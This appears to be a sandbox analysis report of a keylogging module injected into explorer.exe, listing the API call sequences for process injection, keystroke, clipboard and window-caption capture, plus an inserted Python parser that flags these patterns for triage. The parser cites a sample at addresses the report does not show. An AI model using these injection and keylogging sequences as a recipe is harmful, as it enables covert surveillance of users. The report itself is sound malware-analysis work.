                                                                        • Rendered call graph (node list only; shading and the per-node disassembly links are not recoverable): 49 functions. Function_03091000 enters Function_03091016, which calls 030910A5, 030912AE, 030913AE, 030918BF, 0309268F, 030926AE, 030926C9, 0309275A, 0309276D, 0309288D and the helpers 03092724, 03092841, 030929EB, 03092A09.
                                                                        • Functions present: 03091000, 03091016, 030910A5, 030912AE, 030913AE, 03091533, 03091581, 0309162B, 030916B9, 030917DC, 0309182D, 030918BF, 03091B26, 03091BBD, 03091CBF, 03091E26, 03091E66, 03091E89, 03091ED8, 03091F3A, 03091FB4, 03091FEA, 0309200D, 030920A1, 0309240F, 0309243D, 030924CC, 0309255C, 03092569, 030925A4, 030925F1, 0309268F, 030926AE, 030926C9, 03092724, 0309275A, 0309276D, 03092799, 03092841, 0309288D, 0309293E, 0309298A, 030929AE, 030929BD, 030929E9, 030929EB, 03092A09, 03093627, 03099AE0.

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03092724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,030929F3,-00000001,0309128C), ref: 03092731
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03091038
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0309106C
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03091075
                                                                        • GetCurrentProcessId.KERNEL32(?,03091010), ref: 0309107B
                                                                        • wsprintfA.USER32 ref: 030910E7
                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 03091155
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03091160
                                                                        • Process32First.KERNEL32(00000000,?), ref: 0309117F
                                                                        • CharLowerA.USER32(?), ref: 03091199
                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 030911B5
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03091212
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0309126C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0309127F
                                                                        • Sleep.KERNELBASE(000003E8), ref: 0309129F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                        • String ID: %s%s$0-vP,v$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                        • API String ID: 3206029838-1059640896
                                                                        • Opcode ID: 6e62beb66ed9ae49302e770778a82a69859045ccb7f7cc4ae0e0d54b19c63d18
                                                                        • Instruction ID: 33285956bf5f76bc2f995777cb3994a7330d0292c1fe73c9df5af8e0ad94c0df
                                                                        • Opcode Fuzzy Hash: 6e62beb66ed9ae49302e770778a82a69859045ccb7f7cc4ae0e0d54b19c63d18
                                                                        • Instruction Fuzzy Hash: 69513638207306ABEF18FF71DC4897B77EDFBC5340F05096BA9518B290DB388905AA61
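The two "APIs" listings above, the LoadLibraryA / VirtualProtect pair at 00D2A147-00D2A1D9 and the Toolhelp32 enumeration loop at 03091160-0309129F with its lstrcmpiA targets, are the entries an analyst wants pulled out of a report automatically. The Python below is an added example (the editor's code, not Joe Sandbox's): it parses the bullet format used in these blocks, `name.MODULE(args), ref: address`, with the nested "Part of subcall function" lines attributed to the callee, and applies three triage rules. The sample text is copied from the entries above; the rule names, the reading of subcall lines as inherited from the callee, and the 8-hex-digit test for numeric arguments are the editor's assumptions.

```python
"""Parse Joe Sandbox function 'APIs' entries and flag triage-relevant API combinations.

Added example for this report page (editor's code, not Joe Sandbox's). Input is the
bullet list shown under each function: '• name.MODULE(args), ref: addr', plus nested
'• Part of subcall function XXXX: ...' lines, read here as calls inherited from a callee.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Sample input copied from the two function entries on this page (constructed
# as strings so the example runs offline).
SAMPLE_03091000 = """\
  • Part of subcall function 03092724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,030929F3,-00000001,0309128C), ref: 03092731
  • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
• RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03091038
• NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03091075
• GetCurrentProcessId.KERNEL32(?,03091010), ref: 0309107B
• wsprintfA.USER32 ref: 030910E7
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03091160
• Process32First.KERNEL32(00000000,?), ref: 0309117F
• CharLowerA.USER32(?), ref: 03091199
• lstrcmpiA.KERNEL32(?,explorer.exe), ref: 030911B5
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03091212
• Process32Next.KERNEL32(00000000,00000128), ref: 0309126C
• CloseHandle.KERNEL32(00000000), ref: 0309127F
• Sleep.KERNELBASE(000003E8), ref: 0309129F
"""

SAMPLE_00D2A048 = """\
• LoadLibraryA.KERNELBASE ref: 00D2A147
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00D2A1BB
• VirtualProtect.KERNELBASE ref: 00D2A1D9
"""

_ENTRY = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)"        # e.g. lstrcmpiA.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"            # the argument list is optional
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX32 = re.compile(r"^-?[0-9A-Fa-f]{8}$")   # numeric argument as the report prints it (assumption)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: int                      # call-site address
    subcall_of: Optional[int]     # callee address when the entry was inherited from a subcall


def parse_api_entries(text: str) -> list[ApiCall]:
    """Turn the bullet lines into ApiCall records; lines that are not entries are ignored."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def string_args(calls: list[ApiCall], names: set[str]) -> list[str]:
    """Literal (non-numeric, non-'?') arguments passed to the named APIs, e.g. process names."""
    return sorted({a for c in calls if c.name in names
                   for a in c.args if a != "?" and not _HEX32.match(a)})


_CMP = {"lstrcmpA", "lstrcmpW", "lstrcmpiA", "lstrcmpiW"}
_RESOLVE = {"LoadLibraryA", "LoadLibraryW", "GetProcAddress"}


def classify(calls: list[ApiCall]) -> dict:
    """Editor's triage rules; only the function's own calls count, not inherited subcall lines."""
    own = [c for c in calls if c.subcall_of is None]
    names = {c.name for c in own}
    findings: dict = {}
    # Rule 1: a Toolhelp32 walk that compares process names against literals.
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= names:
        findings["process_enumeration"] = string_args(own, _CMP)
    # Rule 2: runtime import resolution together with page-protection changes,
    # the pattern of code that was mapped or decrypted at run time.
    if names & _RESOLVE and "VirtualProtect" in names:
        findings["dynamic_import_and_page_rewrite"] = sorted(names & (_RESOLVE | {"VirtualProtect"}))
    # Rule 3: Sleep intervals (the report prints them in hex milliseconds), to spot polling loops.
    sleeps = [int(c.args[0], 16) for c in own
              if c.name == "Sleep" and c.args and _HEX32.match(c.args[0])]
    if sleeps:
        findings["sleep_ms"] = sleeps
    return findings


if __name__ == "__main__":
    for label, text in (("03091000", SAMPLE_03091000), ("00D2A048", SAMPLE_00D2A048)):
        print(label, classify(parse_api_entries(text)))
```

Run as a script it prints the findings for both samples; `parse_api_entries` accepts the text of any function entry copied from the report, and because the rules are plain set tests, adding one (for instance NtCreateSection + NtMapViewOfSection + CreateRemoteThread) is a single extra condition.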

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • wsprintfA.USER32 ref: 030910E7
                                                                          • Part of subcall function 0309276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03092777
                                                                          • Part of subcall function 0309276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,030910FE), ref: 03092789
                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 03091155
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03091160
                                                                        • Process32First.KERNEL32(00000000,?), ref: 0309117F
                                                                        • CharLowerA.USER32(?), ref: 03091199
                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 030911B5
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03091212
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0309126C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0309127F
                                                                        • Sleep.KERNELBASE(000003E8), ref: 0309129F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                        • API String ID: 3018447944-2805246637
                                                                        • Opcode ID: 7995ec3c80d50397070a2dded2f5bf58388c610c4aed99a513929ae8cb489e24
                                                                        • Instruction ID: 9bf40a53e9bf136f698dc5020b5cd171f4840a84c6106fd6baedd38904761b04
                                                                        • Opcode Fuzzy Hash: 7995ec3c80d50397070a2dded2f5bf58388c610c4aed99a513929ae8cb489e24
                                                                        • Instruction Fuzzy Hash: 2A41E8383073066BEE14FF65CC8497FB3EDFBC5740F040A6BA9919B290EB349905AA51

                                                                        Control-flow Graph

                                                                        • Rendered graph (node list only; executed/not-executed shading not recoverable): basic blocks 3099ae0 through 3099cad. LoadLibraryA at 3099bfa-3099c10 and GetProcAddress at 3099c23-3099c30 each sit inside a loop that passes through 3099c11-3099c16; VirtualProtect is called twice at 3099c70-3099ca0, followed by the self-looping blocks 3099ca4-3099ca8 and 3099cad.
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003098000.00000040.80000000.00040000.00000000.sdmp, Offset: 03098000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3098000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f4466b2c9bb0727e077ba47d382605d2602b882d85586a3806476c8633524c8
                                                                        • Instruction ID: 1be0114264494ae08c0391719ba061df5446747c64d94055072b610deff3537e
                                                                        • Opcode Fuzzy Hash: 6f4466b2c9bb0727e077ba47d382605d2602b882d85586a3806476c8633524c8
                                                                        • Instruction Fuzzy Hash: 485127B1A462525AFF20CA78CD807B5B7D8EB42230B1C077EC5E6C73C6E7985806E760

                                                                        Control-flow Graph

                                                                        • Rendered graph (node list only): 309276d-309277f OpenFileMappingA branches either to 3092781-3092791 MapViewOfFile or directly to the exit block 3092794-3092798.
                                                                        APIs
                                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03092777
                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,030910FE), ref: 03092789
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$MappingOpenView
                                                                        • String ID:
                                                                        • API String ID: 3439327939-0
                                                                        • Opcode ID: 432b158ff54ef1501b70044838f3929d0c31760967a9896d3dd3ac720691665b
                                                                        • Instruction ID: 20a6ab9357cc80d3f6a490bd3e2a8b34cc028ebd6190c517475d7fb0cf061704
                                                                        • Opcode Fuzzy Hash: 432b158ff54ef1501b70044838f3929d0c31760967a9896d3dd3ac720691665b
                                                                        • Instruction Fuzzy Hash: A0D01736702231BBE7746A7B6C0CF83AEDDEFC6AE1B020026B50DD2140D6648810C6F0

                                                                        Control-flow Graph

                                                                        • Rendered graph (node list only): single block 309275a-309276c calling UnmapViewOfFile then CloseHandle.
                                                                        APIs
                                                                        • UnmapViewOfFile.KERNEL32(00000000,?,0309129A,00000001), ref: 0309275E
                                                                        • CloseHandle.KERNELBASE(?,?,0309129A,00000001), ref: 03092765
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFileHandleUnmapView
                                                                        • String ID:
                                                                        • API String ID: 2381555830-0
                                                                        • Opcode ID: 754826d17893706b8000f0ec4cad5785ef723ee40c510e060ddaf607bdf90a29
                                                                        • Instruction ID: 8731f499047776ab4aae619f2e79d353c3f6fd0d4fdf0951262ab211198626af
                                                                        • Opcode Fuzzy Hash: 754826d17893706b8000f0ec4cad5785ef723ee40c510e060ddaf607bdf90a29
                                                                        • Instruction Fuzzy Hash: 70B0123A40703097C3243734781C9DB3F18FEC922130701C6F14D81008472C08018EE8

                                                                        Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                                                                        • Block 3092a09-3092a19: GetProcessHeap, RtlAllocateHeap
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: 5b3eff69bf06d758c4434b4b2c511dba51822f26f25ef5f3a6b294ab5203d3ad
                                                                        • Instruction ID: 95f09a7fb9299f640903f6bc59dfb298572e9f4141b3b6f83b59e169f2cb5e79
                                                                        • Opcode Fuzzy Hash: 5b3eff69bf06d758c4434b4b2c511dba51822f26f25ef5f3a6b294ab5203d3ad
                                                                        • Instruction Fuzzy Hash: CFA002B56512006BDE5477E4A91EF167758B7C4701F0145857296C50849D7954448F21

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03092724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,030929F3,-00000001,0309128C), ref: 03092731
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 030918F4
                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0309192F
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 030919BF
                                                                        • RtlMoveMemory.NTDLL(00000000,03093638,00000016), ref: 030919E6
                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03091A0E
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03091A1E
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03091A38
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 03091A40
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091A4E
                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091A55
                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 03091A6B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 03091A72
                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03091A88
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03091AB2
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03091AC5
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091ACC
                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091AD3
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03091AE7
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03091AFE
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091B0B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091B11
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091B17
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03091B1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                        • String ID: 0-vP,v$atan$ntdll$opera_shared_counter
                                                                        • API String ID: 1066286714-2395699481
                                                                        • Opcode ID: 24c2200e27abb652ca1bfd4c75f1b7e4ce00125b251973345659544986cc25f9
                                                                        • Instruction ID: 3f169ad1e6b2d46940cd7683615a7c7166f3c54d3bf143f9de22ae338024f98f
                                                                        • Opcode Fuzzy Hash: 24c2200e27abb652ca1bfd4c75f1b7e4ce00125b251973345659544986cc25f9
                                                                        • Instruction Fuzzy Hash: BA61BD35206306AFEB14EF25CC84E6BBBEDFB89750F05055AF999D3241D774D8048BA2

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 030927B5
                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 030927CD
                                                                        • lstrlen.KERNEL32(?,00000000), ref: 030927D5
                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 030927E0
                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 030927FA
                                                                        • wsprintfA.USER32 ref: 03092811
                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0309282A
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 03092834
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                        • String ID: %02X
                                                                        • API String ID: 3341110664-436463671
                                                                        • Opcode ID: 2bd97d09e0d35ac86c0825777d4c038cde02dcb449ad17eefc287650144abd4e
                                                                        • Instruction ID: dc614c372e460c696764faba9b815507c107d913590982b1c8d04692e568c61e
                                                                        • Opcode Fuzzy Hash: 2bd97d09e0d35ac86c0825777d4c038cde02dcb449ad17eefc287650144abd4e
                                                                        • Instruction Fuzzy Hash: AD114975902108BFEB11AB99EC89EEFBBBCFB88301F1140A6F644E2110D7354E159B60

                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 03091652
                                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0309167A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardStateUnicode
                                                                        • String ID:
                                                                        • API String ID: 3453085656-3916222277
                                                                        • Opcode ID: db6e4163524f0b9405c24a2deb0321f194a60a75eca83da9217f2fe9946ced5a
                                                                        • Instruction ID: 6f6c1c5152eb7f259ec537650696eb60b86ac31bb919418057ca2fcda33f57fc
                                                                        • Opcode Fuzzy Hash: db6e4163524f0b9405c24a2deb0321f194a60a75eca83da9217f2fe9946ced5a
                                                                        • Instruction Fuzzy Hash: F2016D36E0221A9AEF38DF55D945BFBB3BCAF85B00F0C445BE901E2150D734E5459AA1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(03095013,0000001C), ref: 030913C8
                                                                        • VirtualQuery.KERNEL32(030913AE,?,0000001C), ref: 030913DA
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0309140B
                                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 0309141C
                                                                        • wsprintfA.USER32 ref: 03091433
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 03091448
                                                                        • GetLastError.KERNEL32 ref: 0309144E
                                                                        • RtlInitializeCriticalSection.NTDLL(0309582C), ref: 03091465
                                                                        • Sleep.KERNEL32(000001F4), ref: 03091489
                                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 030914A6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030914AF
                                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 030914D0
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030914D3
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 030914F1
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0309150D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03091514
                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0309152A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                        • API String ID: 3628807430-1779906909
                                                                        • Opcode ID: e5f9369dae0c920649bf49eada96dc06e3f086588248543c490ed9bd074d340a
                                                                        • Instruction ID: cb98a0e73468a1b141a722292b3e2886a11ffbbf643ff20771137694f07f7f31
                                                                        • Opcode Fuzzy Hash: e5f9369dae0c920649bf49eada96dc06e3f086588248543c490ed9bd074d340a
                                                                        • Instruction Fuzzy Hash: 0141A378702309FBEF15FB669C19A5F7BACFBC5740B02445BF5468A245CB7998009FA0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlEnterCriticalSection.NTDLL(0309582C), ref: 030916C4
                                                                        • lstrlenW.KERNEL32 ref: 030916DB
                                                                        • lstrlenW.KERNEL32 ref: 030916F3
                                                                        • wsprintfW.USER32 ref: 03091743
                                                                        • GetForegroundWindow.USER32 ref: 0309174E
                                                                        • GetWindowTextW.USER32(00000000,03095850,00000800), ref: 03091767
                                                                        • GetClassNameW.USER32(00000000,03095850,00000800), ref: 03091774
                                                                        • lstrcmpW.KERNEL32(03095020,03095850), ref: 03091781
                                                                        • lstrcpyW.KERNEL32(03095020,03095850), ref: 0309178D
                                                                        • wsprintfW.USER32 ref: 030917AD
                                                                        • lstrcatW.KERNEL32 ref: 030917C6
                                                                        • RtlLeaveCriticalSection.NTDLL(0309582C), ref: 030917D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                        • API String ID: 2651329914-3371406555
                                                                        • Opcode ID: a70b32f1bff09c4bf1b1336f40914fd45a30d3f7fd4762e24d8df2a093d059fe
                                                                        • Instruction ID: 84412fefc695e8614395ebdb414fc9d013a8420e8c87ac6c04b19098eaec2d96
                                                                        • Opcode Fuzzy Hash: a70b32f1bff09c4bf1b1336f40914fd45a30d3f7fd4762e24d8df2a093d059fe
                                                                        • Instruction Fuzzy Hash: E021DB3860720ABBFB26B726EC8896F7BBCFBC27547050097F45156119DA198C01ABE5

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 03092603
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0309260B
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0309261B
                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 03092629
                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 03092648
                                                                        • SuspendThread.KERNEL32(00000000), ref: 03092658
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03092667
                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 03092677
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03092682
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 1467098526-0
                                                                        • Opcode ID: 075dd1e85d8b2a2e01e3a1d21722cf1165dac08c563a2e5b300d30864460b80c
                                                                        • Instruction ID: d6d567d979728d11eabb34a43d224bd7fd45969740ae3eda7b582bc5ca638ced
                                                                        • Opcode Fuzzy Hash: 075dd1e85d8b2a2e01e3a1d21722cf1165dac08c563a2e5b300d30864460b80c
                                                                        • Instruction Fuzzy Hash: A4115139406304EBEB01EF60E85CA6FBBA8FB84705F05099BF58592144D73889159FA2

                                                                        Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                                                                        • Entry block 30920a1-30920fc: calls 309240f, 3092a09, 309298a, 30924cc
                                                                        • Block 309212f-3092166: RtlZeroMemory
                                                                        • Block 3092258-3092286: call 3092a09, wsprintfW
                                                                        • Block 30922b8-30922ee: call 3092a09, wsprintfW
                                                                        • Block 309239a-30923a7: RtlMoveMemory
                                                                        • Exit block 30923fd-309240c: call 30929eb
                                                                        APIs
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                          • Part of subcall function 0309298A: lstrlen.KERNEL32(03094FE2,?,00000000,00000000,030920DD,75918A60,03094FE2,00000000), ref: 03092992
                                                                          • Part of subcall function 0309298A: MultiByteToWideChar.KERNEL32(00000000,00000000,03094FE2,00000001,00000000,00000000), ref: 030929A4
                                                                          • Part of subcall function 030924CC: RtlZeroMemory.NTDLL(?,00000018), ref: 030924DE
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 03092139
                                                                        • wsprintfW.USER32 ref: 03092272
                                                                        • wsprintfW.USER32 ref: 030922DD
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030923A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
